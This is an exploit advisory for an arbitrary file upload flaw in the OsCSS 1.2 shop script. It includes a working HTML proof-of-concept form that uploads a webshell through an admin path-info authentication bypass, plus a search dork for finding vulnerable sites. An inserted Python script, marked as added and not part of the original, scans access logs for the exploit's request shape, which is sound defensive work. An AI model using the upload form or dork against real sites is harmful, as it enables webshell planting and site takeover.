OsCSS is an open-source online shop script system. OsCSS 1.2 has an arbitrary file upload vulnerability, which may allow attackers to upload webshells.
[+] Info:
~~~~~~~~~
# Exploit Title: OsCSS Remote File Upload Exploit
# Date: 12-1-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform/Tested on: Windows XP SP2 DE & Ubuntu 10.10
# Category: webapps/0day
# Dork: inurl: "sorry scriptkiddies"
# Contact: shichemt@hotmail.com - http://www.shichemt-alen.com/
[+] Poc:
~~~~~~~~~
<br><u>Upload Shell:</u><br>
<form name="file" action="http://localhost/admin/categories.php/login.php?action=insert_category&cPath=" method="post" enctype="multipart/form-data">
<input type="file" name="categories_image"><br>
<input name="submit" type="submit" value="Upload">
</form>
<center>
<a href="http://www.shichemt-alen.com/">Shichemt-Alen©</a> 2010
</center>
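
A defensive check for the request shape used in the PoC, added here as an example and not part of the original advisory: it scans web-server access logs for requests where an admin script is followed by a second .php path segment, and marks POSTs carrying action=insert_category as the upload request itself. The combined log format, the severity labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# An admin .php script followed by a second .php path segment, the shape of the
# PoC's /admin/categories.php/login.php (case-insensitive, since Windows hosts
# ignore case in file names).
PATHINFO_RE = re.compile(r"/admin/[^/]+\.php/[^/]+\.php$", re.IGNORECASE)

# Constructed sample lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2010:10:00:01 +0000] "GET /admin/login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Dec/2010:10:00:05 +0000] "POST /admin/categories.php?action=insert_category&cPath= HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Dec/2010:10:03:12 +0000] "POST /admin/categories.php/login.php?action=insert_category&cPath= HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Dec/2010:10:05:00 +0000] "GET /admin/CATEGORIES.php/Login.php HTTP/1.1" 200 900 "-" "curl/7.21"
203.0.113.4 - - [01/Dec/2010:10:07:30 +0000] "POST /shop/admin/categories%2Ephp/login.php?action=insert_category&cPath=1 HTTP/1.1" 200 4188 "-" "Mozilla/5.0"
"""


def scan(log_text):
    """Return (client, severity, status, target) for PoC-shaped requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, method, target, status = m.groups()
        url = urlsplit(target)
        # Decode %xx first so an encoded dot cannot hide the path shape.
        if not PATHINFO_RE.search(unquote(url.path)):
            continue
        actions = parse_qs(url.query, keep_blank_values=True).get("action", [])
        # POST plus action=insert_category matches the PoC form submission;
        # any other hit on the path shape is left for an analyst to review.
        upload = method == "POST" and "insert_category" in actions
        findings.append((client, "high" if upload else "review", int(status), target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
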
[+] Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15651